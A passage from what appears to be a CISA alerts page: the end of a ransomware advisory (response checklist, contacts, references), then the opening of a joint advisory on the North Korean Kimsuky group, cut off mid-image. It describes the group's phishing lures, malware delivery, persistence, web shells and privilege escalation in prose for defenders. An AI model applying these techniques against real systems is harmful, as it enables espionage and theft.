<li>Private sector organizations: <a href=”https://us-cert.cisa.govCyberLiaison_Industry@cisa.dhs.gov”>CyberLiaison_Industry@cisa.dhs.gov</a></li>
</ul>
</li>
</ul>

<h4><em>Ransomware Quick References</em></h4>

<ul>
<li><em>Ransomware: What It Is and What to Do About It </em>(CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: <a href=”https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_ Document-FINAL.pdf”>https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_ Document-FINAL.pdf</a></li>
<li>Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <a href=”https://www.us-cert.cisa.gov/Ransomware”>https://www.us-cert.cisa.gov/Ransomware</a> &nbsp;</li>
<li>HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at <a href=”https://us-cert.cisa.govwww.hhs.gov/hc3″>www.hhs.gov/hc3</a></li>
<li><em>Security Primer – Ransomware</em> (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <a href=”https://www.cisecurity.org/white-papers/security-primer-ransomware/”>https://www.cisecurity.org/white-papers/security-primer-ransomware/</a></li>
<li><em>Ransomware: Facts, Threats, and Countermeasures </em>(MS- ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: <a href=”https://www.cisecurity.org/blog/ransomware- facts-threats-and-countermeasures/”>https://www.cisecurity.org/blog/ransomware- facts-threats-and-countermeasures/</a></li>
<li>HHS Ransomware Fact Sheet: <a href=”https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf”>https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf</a></li>
<li>NIST Securing Data Integrity White Paper: <a href=”https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft”>https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft</a></li>
</ul>

<h4>Ransomware Response Checklist</h4>

<p><strong>Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.</strong></p>

<p>Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a>, which contains steps for detection and analysis as well as containment and eradication.</p>

<h4><em>Consider the Need For Extended Identification or Analysis</em></h4>

<p>If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:</p>

<ul>
<li>Recovered executable file</li>
<li>Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible</li>
<li>Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li>
<li>Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li>
<li>Malware samples</li>
<li>Names of any other malware identified on your system</li>
<li>Encrypted file samples</li>
<li>Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)</li>
<li>Any PowerShell scripts found having executed on the systems</li>
<li>Any user accounts created in Active Directory or machines added to the network during the exploitation</li>
<li>Email addresses used by the attackers and any associated phishing emails</li>
<li>A copy of the ransom note</li>
<li>Ransom amount and whether or not the ransom was paid</li>
<li>Bitcoin wallets used by the attackers</li>
<li>Bitcoin wallets used to pay the ransom (if applicable)</li>
<li>Copies of any communications with attackers</li>
</ul>

<p>Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.</p>

<ul>
<li>CISA – Advanced Malware Analysis Center: <a href=”https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf”>https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf</a></li>
<li>Remote Assistance – Request via <a href=”https://us-cert.cisa.govCentral@cisa.gov”>Central@cisa.gov</a></li>
</ul>
<h3>Contact Information</h3><p>CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purpose of notification.</p>

<ul>
<li>State and Local Response Contacts</li>
<li>IT/IT Security Team – Centralized Cyber Incident Reporting</li>
<li>State and Local Law Enforcement</li>
<li>Fusion Center&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;</li>
<li>Managed/Security Service Providers</li>
<li>Cyber Insurance&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;</li>
</ul>

<p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”https://www.fbi.gov/contact-us/field-offices”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href=”https://us-cert.cisa.govCyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govCentral@cisa.dhs.gov”>Central@cisa.gov</a>.</p>

<p>Additionally, see <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for information on contacting—and what to expect from contacting—federal asset response and federal threat response contacts.</p>

<h3><em>Disclaimer</em></h3>

<p>This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <a href=”https://cisa.gov/tlp”>https://cisa.gov/tlp</a>.</p>
<h3>References</h3>
<ul> <li><a href=”https://www.cisa.gov/emergency-services-sector-continuity-planning-suite”>CISA Emergency Services Sector Continuity Planning Suite </a></li> <li><a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA MS-ISAC Joint Ransomware Guide</a></li> <li><a href=”https://us-cert.cisa.gov/ncas/tips/ST04-014″>CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li> <li><a href=”https://www.ic3.gov/media/2019/191002.aspx”>FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations”</a></li> <li><a href=”https://healthsectorcouncil.org/hic-tcr/”>Health Industry Cybersecurity Tactical Crisis Response</a></li> <li><a href=”http://www.phe.gov/405d”>Health Industry Cybersecurity Practices (HICP) </a></li> <li><a href=”https://protect2.fireeye.com/url?k=661c55bd-3a495cae-661c6482-0cc47adb5650-bb09b09e1017f10b&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=99373fd9c7&e=7882426b51″>HHS – Ransomware Spotlight Webinar </a></li> <li><a href=”https://protect2.fireeye.com/url?k=b43c8fe1-e86986f2-b43cbede-0cc47adb5650-84218742b50e2b7e&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=3d453bb6fe&e=7882426b51″>HHS – Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients</a></li> <li><a href=”https://protect2.fireeye.com/url?k=6a477b44-36127257-6a474a7b-0cc47adb5650-f6c92a4c247070ec&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=071616ff3e&e=7882426b51″>HHS – Ransomware Briefing </a></li> <li><a href=”https://protect2.fireeye.com/url?k=fe80c15e-a2d5c84d-fe80f061-0cc47adb5650-2206dbc55c13f1de&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=ebb762e019&e=7882426b51″>HHS – Aggressive Ransomware Impacts</a></li> <li><a href=”https://protect2.fireeye.com/url?k=2923cea5-7576c7b6-2923ff9a-0cc47adb5650-26d7a0932fe07e31&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=107ba38369&e=7882426b51″>HHS – Ransomware Fact Sheet</a></li> <li><a href=”https://protect2.fireeye.com/url?k=08e10c16-54b40505-08e13d29-0cc47adb5650-70b9e6fd13ea4f2d&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=bcc423d21d&e=7882426b51″>HHS – Cyber Attack Checklist</a></li> <li><a href=”https://protect2.fireeye.com/url?k=8497e505-d8c2ec16-8497d43a-0cc47adb5650-ba5cee20bcf28bab&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=dc2b43974c&e=7882426b51″>HHS – Cyber-Attack Response Infographic</a></li> <li><a href=”https://protect2.fireeye.com/url?k=0be33d8b-57b63498-0be30cb4-0cc47adb5650-be7b920b52ab7927&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=c89bf12fa8&e=7882426b51″>NIST – Data Integrity Publication</a></li> <li><a href=”https://protect2.fireeye.com/url?k=5335b9d4-0f60b0c7-533588eb-0cc47adb5650-bbc2d82317c6bc45&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=eeb05487cf&e=7882426b51″>NIST – Guide for Cybersecurity Event Recovery</a></li> <li><a href=”https://protect2.fireeye.com/url?k=348a7900-68df7013-348a483f-0cc47adb5650-5210c734b99339b1&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=9f0f789411&e=7882426b51″>NIST – Identifying and Protecting Assets Against Ransomware and Other Destructive Events </a></li> <li><a href=”https://protect2.fireeye.com/url?k=daf6be91-86a3b782-daf68fae-0cc47adb5650-1f4f5f947a590fa0&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=958743a29c&e=7882426b51″>NIST – Detecting and Responding to Ransomware and Other Destructive Events </a></li> <li><a href=”https://protect2.fireeye.com/url?k=90b40d5e-cce1044d-90b43c61-0cc47adb5650-bab63aa79a2b0b2a&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=4947ff3a54&e=7882426b51″>NIST – Recovering from Ransomware and Other Destructive Events </a></li> <li><a href=”https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456″>Github List of IOCs</a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 28, 2020: Initial version</li> <li>October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection</li> <li>November 2, 2020: Updated FBI link</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy &amp; Use</a> policy.</p>

</div>

Categories
alerts

AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky

Original release date: October 27, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 7 framework. See the <a href=”https://attack.mitre.org/versions/v7/techniques/enterprise/”>ATT&amp;CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group <a href=”https://attack.mitre.org/groups/G0094/”>Kimsuky</a>—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit <a href=”https://us-cert.cisa.gov/northkorea”>https://www.us-cert.cisa.gov/northkorea</a>.</p>

<p>This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.</p>

<p><a href=”https://us-cert.cisa.gov/sites/default/files/publications/TLP-WHITE_AA20-301A_North_Korean_APT_Focus_Kimsuky.pdf”>Click here</a> for a PDF version of this report.</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Key Findings</h4>

<p>This advisory’s key findings are:</p>

<ul>
<li>The Kimsuky APT group has most likely been operating since 2012.</li>
<li>Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.</li>
<li>Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>1</a>],[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>2</a>]</li>
<li>Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>3</a>]</li>
<li>Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.</li>
<li>Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.</li>
<li>Kimsuky specifically targets:</li>
<li>
<ul>
<li>Individuals identified as experts in various fields,</li>
<li>Think tanks, and</li>
<li>South Korean government entities.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>4</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>5</a>],[<a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>6</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>7</a>],[<a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>8</a>]</li>
</ul>
</li>
<li>CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.</li>
</ul>
<h3>Technical Details</h3><h4>Initial Access</h4>

<p>Kimsuky uses various spearphishing and social engineering methods to obtain <em>Initial Access</em> [<a href=”https://attack.mitre.org/tactics/TA0001/”>TA0001</a>] to victim networks.[<a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>9</a>],[<a href=”https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html”>10</a>],[<a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>11</a>] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/001/”>T1566.001</a>]).[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>12</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>13</a>]</p>

<ul>
<li>The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]</li>
<li>Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
<ul style=”list-style-type: circle;”>
<li>Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.</li>
<li>After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.</li>
</ul>
</li>
<li>Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>15</a>],[<a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>16</a>],[<a href=”https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/”>17</a>]</li>
</ul>

<p>Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (<em>Phishing: Spearphising Link</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/002/”>T1566.002</a>], <em>Drive-by Compromise </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1189/”>T1189</a>], <em>Man-in-the-Browser</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>18</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Execution</h4>

<p>After obtaining initial access, Kimsuky uses <a href=”https://attack.mitre.org/software/S0414/”>BabyShark</a> malware and PowerShell or the Windows Command Shell for <em>Execution</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0002/”>TA0002</a>].</p>

<ul>
<li>BabyShark is Visual Basic Script (VBS)-based malware.
<ul>
<li>First, the compromised host system uses the native Microsoft Windows utility, <code>mshta.exe</code>, to download and execute an HTML application (HTA) file from a remote system (<em>Signed Binary Proxy Execution: Mshta</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/005/”>T1218.005</a>]).</li>
<li>The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.</li>
<li>The script maintains<em> Persistence </em>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>] by creating a Registry key that runs on startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1547.001</a>]).</li>
<li>&nbsp;It then collects system information (<em>System Information Discovery</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1082″>T1082</a>]), sends it to the operator’s command control (C2) servers, and awaits further commands.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>19</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>20</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>21</a>],[<a href=”https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/”>22</a>]</li>
</ul>
</li>
<li>Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (<em>Phishing: Spearphising Link</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/002/”>T1566.002</a>], <em>Phishing: Spearphishing Attachment</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/001″>T1566.001</a>]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>23</a>]</li>
<li>Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (<em>Command and Scripting Interpreter: PowerShell </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/001/”>T1059.001</a>]). PowerShell commands/scripts can be executed without invoking <code>powershell.exe</code> through HTA files or <code>mshta.exe</code>.[<a href=”https://attack.mitre.org/groups/G0094/”>24</a>],[<a href=”https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/”>25</a>],[<a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>26</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>27</a>]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Persistence</h4>

<p>Kimsuky has demonstrated the ability to establish <em>Persistence</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>] through using malicious browser extensions, modifying system processes, manipulating the <code>autostart</code> execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.</p>

<ul>
<li>In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (<em>Man-in-the-Browser </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]). The extension’s reviews gave it a five-star rating, however the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>28</a>]</li>
<li>Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (<em>Boot or Logon Autostart Execution </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1547″>T1547</a>]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[<a href=”https://attack.mitre.org/groups/G0094/”>29</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>30</a>]</li>
<li>During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (<em>Remote Services: Remote Desktop Protocol </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1021/001″>T1021.001</a>]).[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>31</a>]</li>
<li>Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (<code>.hwp</code> files) in the Registry (<em>Event Triggered Execution: Change Default File Association</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/001″>T1546.001</a>]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>32</a>] Kimsuky also targets Microsoft Office users by formatting their documents in a <code>.docx</code> file rather than <code>.hwp</code> and will tailor their macros accordingly.[33]</li>
<li>Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (<em>Server Software Component: Web Shell</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T505/003″>T1505.003</a>]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Privilege Escalation</h4>

<p>Kimsuky uses well-known methods for <em>Privilege Escalation </em>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0004/”>TA0004</a>]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in <code>explorer.exe</code>.</p>

<ul>
<li>Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass the User Account Control to inject malicious code into <code>explorer.exe</code> (<em>Process Injection</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. It then saves the decrypted file to a disk with a random but hardcoded name (e.g., <code>dfe8b437dd7c417a6d.tmp</code>) in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>35</a>]</li>
<li>Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within <code>explorer.exe</code> (<em>Process Injection</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]).[<a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>36</a>]</li>
</ul>

<p align=”center” style=”text-align: center; margin-bottom: 8px;”><font color=”#000000″><font face=”Times New Roman”><img alt=”” data-entity-type=”” data-entity-uuid=”” src=”https://us-cert.cisa.govdata:image/png;base64,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